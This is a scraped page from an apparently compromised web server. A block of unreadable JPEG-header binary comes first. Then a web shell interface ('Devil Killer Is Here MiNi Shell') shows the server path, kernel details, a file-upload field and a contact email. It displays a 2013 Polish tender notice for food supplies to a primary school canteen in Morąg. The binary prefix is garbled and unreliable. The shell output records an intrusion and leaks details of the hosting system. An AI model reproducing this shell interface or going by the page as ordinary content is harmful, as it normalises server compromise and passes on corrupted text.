JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130705/134711-N-2013.html

<p class="kh_header"><b>Morąg: Dostawa artykułów żywnościowych do stołówki szkolnej.</b><br>
<b>Numer ogłoszenia: 134711 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 2 w Morągu im. Władysława Reymonta , ul. Żeromskiego 26, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 0-89 7574777, faks 0-89 7574777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp2morag.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja samorządowa (szkoła).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do stołówki szkolnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr I - Kod CPV 03142300-1 - Jadalne produkty pochodzenia zwierzęcego: 1. Jaja świeże (czyste) - 4 570,00 szt.; Pakiet nr II - Kod CPV 03212000-0 - Ziemniaki i warzywa suszone: 1. Fasola łuskana - 72,00kg; 2. Groch łuskany (połówki) - 45,00kg; 3. Ziemniaki - 7 955,00 kg; Pakiet nr III - Kod CPV 03220000-9 -Warzywa, owoce i orzechy: 1. Buraki ćwikłowe - 187,00 kg; 2. Cebula - 188,00 kg; 3. Cebula czerwona - 11,00 kg; 4. Jabłka (deserowe) - 59,00 kg; 5. Kapusta biała - 269,00 kg; 6. Kapusta czerwona - 8,00kg; 7. Kapusta młoda - 82,00 szt.; 8. Kapusta pekińska - 116,00 kg; 9. Koper - 56,00 szt.; 10. Marchew - 579,00 kg; 11. Natka z pietruszki - 65,00 szt.; 12. Ogórki świeże - 246,00 kg; 13. Papryka świeża - 29,30 kg; 14. Pieczarki świeże - 110,00 kg; 15. Pietruszka (korzeń) - 232,50 kg; 16. Pomidory-153,50 kg; 17. Por - 85,00 kg; 18. Seler - 126,50 kg; Pakiet nr IV - Kod CPV 15111000-9 - Mięso wołowe: 1. Mięso gulaszowe - 83,60 kg; 2. Szponder - 47,00 kg; 3. Antrykot - 5,00 kg; Pakiet nr V - Kod CPV 15112000-6 - Drób: 1. Filet z kurczaka - 485,20 kg; 2. Mięso gulaszowe z indyka - 48,70 kg; 3. Porcja rosołowa -256,70 kg; 4. Udziec z kurczaka - 361,50 kg; 5.Żołądki z indyka - 26,00 kg; Pakiet nr VI - Kod CPV 15113000-3 - Wieprzowina: 1. Boczek sur. - 18,45 kg; 2. Golonka (tyl.) - 19,10 kg; 3. Karkówka b/k - 53,70 kg; 4. Kości schabowe - 355,00 kg; 5. Łopatka b/k - 825,80 kg; 6. Pachwina - 37,95 kg; 7. Schab sur. b/k - 150,00 kg; 8. Schab sur. z/k - 277,85 kg; 9. Szynka sur. b/k - 146,65 kg; 10. Żeberka - 64,95 kg;Pakiet nr VII - Kod CPV 15114000-0 - Podroby: 1. Flaki woł. (krojone) - 16,00 kg; 2. Wątroba wieprzowa - 28,00 kg; Pakiet nr VIII - Kod CPV 15130000-8 - Produkty mięsne: 1. Boczek wędzony - 99,60 kg; 2. Kiełbasa biała sur. - 50,55 kg; 3. Kiełbasa mazowiecka - 12,05 kg; 4. Kiełbasa podwawelska -58,90 kg; 5.Kiełbasa toruńska- 110,35 kg; 6. Kiełbasa śląska- 127,30 kg; 7. Mortadela- 49,45 kg; Pakiet nr IX - Kod CPV 15200000-0 - Ryby przetworzone i konserwowane:1. Filet miruna (mroż.)- 122,40 kg; 2. Filet SOLA (mroż.) - 25,00 kg; 3. Filet z tilapii (mroż.)- 175,00 kg; 4. Matias (płaty solone) - 20,00 kg;Pakiet nr X - Kod CPV 15330000-0 - Przetworzone owoce i warzywa: 1. Chrzan tarty- 5,00 kg; 2. Fasola szparagowa (mroż.) - 60,00 kg; 3. Fasola konserwowa (po odcieku) - 5,20;kg; 4. Groszek konserwowy (po odcieku) - 2,40 kg; 5. Groszek zielony (mroż.) - 4,50 kg; 6. Kalafior (mroż.)- 76,00 kg; 7. Koncentrat pomidorowy 30%- 81,65 kg; 8. Kukurydza konserwowa (po odcieku) - 34,15 kg; 9. Marchew z groszkiem (po odcieku) - 86,50 kg; 10. Mieszanka kompotowa (mroż.) - 35,00 kg; 11. Mieszanka warzywna (7-składnikowa; mroż.) -44,50 kg; 12. Włoszczyzna krojona w paski (mroż.) - 73,50 kg; 13. Ogórki konserwowe (po odcieku)- 70,00 kg; 14. Papryka (mroż.) - 14,00 kg; 15. Placki ziemniaczane (mroż.)- 270,00 kg; 16. Szczaw krojony (po odcieku) - 55,00 kg; 17. Truskawki (mroż.) - 130,00 kg; 18. Warzywa na patelnię (mroż.) - 20,50 kg; Pakiet nr XI - Kod CPV 15330000-0 - Przetworzone owoce i warzywa: 1. Kapusta kiszona - 352,00 kg; 2. Ogórek kwaszony -191,00 kg; Pakiet nr XII - Kod CPV 15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne: 1. Masło roślinne -2,50 kg; 2. Olej uniwersalny - 276,70 l.; 3. Planta -3,80 kg; 4. Smalec - 59,00 kg; Pakiet nr XIII - Kod CPV 15500000-3 - Produkty mleczarskie: 1. Śmietana 30% -268,00 l.; 2. Śmietana ukwaszana 18% -206,20 l.; 3. Śmietana ukwaszana 12% - 41,60 l.; 4. Twaróg półtłusty - 91,93 kg; Pakiet nr XIV - Kod CPV 15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych: 1. Kasza gryczana - 170,00 kg; 2. Kasza jęczmienna (średnia) - 87,00 kg; 3. Kasza manna -5,00 kg; 4. Mąka pszenna (typ 550) - 52,00 kg; 5. Mąka ziemniaczana - 5,00 kg; 6. Ryż długoziarnisty -139,00 kg; 7. Ryż paraboliczny - 15,00 kg; 8. Syrop owocowy do sporządzania napojów- 540,50 l.; Pakiet nr XV - Kod CPV 15800000-6 - Różne produkty spożywcze: 1. Biały barszcz (zupa w proszku) - 12,01 kg; 2. Bułka tarta- 99,50 kg; 3. Bułki zwykłe - 455,00 szt.; 4. Chleb świeży (krojony) - 3 128,00 szt.; 5. Cukier biały -222,00 kg; 6. Cukier puder - 7,00 kg; 7. Cukier waniliowy - 1,42 kg; 8. Czekolada nadziewana -243,00 szt.; 9. Czekolada mleczna z całymi orzechami laskowymi - 467,00 szt.; 10. Delicje -224,00 szt.; 11. Delikat do drobiu - 3,00 kg; 12. Delikt do mięs - 4,20 kg; 13. Hamburger w panierce (mroż.) - 80,00 kg; 14. Ketchup łagodny- 8,35 kg; 15. Knedle z truskawkami (mroż.)- 195,00 kg; 16. Krokiety z kapustą i grzybami (mroż.) -105,00 kg; 17. Krokiety z mięsem (mroż.) -131,00 kg; 18. Kwasek cytrynowy - 0,80 kg; 19. Liść laurowy -0,40 kg; 20. Majeranek-1,15 kg; 21. Majonez kętrzyński - 24,92 kg; 22. Makaron z mąki pszennej-638,60 kg; 23. Musztarda serbska - 3,00 kg; 24. Naleśniki z serem (mroż.) - 261,00 kg; 25. Ocet spirytusowy 10%- 5,50 l.; 26. Ocet winny - 3,00 l.; 27. Oregano - 0,70 kg; 28. Papryka mielona - 3,08 kg; 29. Pieprz czarny - mielony- 5,75 kg; 30. Pieprz ziołowy - 3,00 kg; 31. Przyprawa do zup w płynie - 1,00 l.; 32. Przyprawa uniwersalna - 32,90 kg 33. Pyzy z mięsem (mroż.) - 138,00 kg; 34. Sos boloński - 36,20 kg; 35. Sos myśliwski (w proszku) - 2,70 kg; 36. Sos pieczeniowy (w proszku) - 7,50 kg; 37. Sól czosnkowa- 1,40 kg; 38. Sól kamienna jodowana spożywcza- 205,00 kg; 39. Vegeta- 3,00 kg; 40. Warzywko- 2,40 kg; 41. Ziele angielskie - 0,95 kg; 42. Zupa ogonowa (w proszku) - 4,00 kg; 43. Zupa pieczarkowa (w proszku) - 10,00 kg; 44. Bazylia- 0,40 kg; 45. Żurek (zupa w proszku) - 5,00 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.14.23.00-1, 03.21.20.00-0, 03.22.00.00-9, 15.11.10.00-9, 15.11.20.00-6, 15.11.30.00-3, 15.11.40.00-0, 15.13.00.00-8, 15.20.00.00-0, 15.33.00.00-0, 15.33.00.00-0, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp2morag.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Szkoły Podstawowej nr 2 
w Morągu, ul. Żeromskiego 26 w godz. 800 - 1400.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2013 godzina 09:00, miejsce: Sekretariat Szkoły Podstawowej nr 2 
w Morągu, ul. Żeromskiego 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 30.06.2014.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com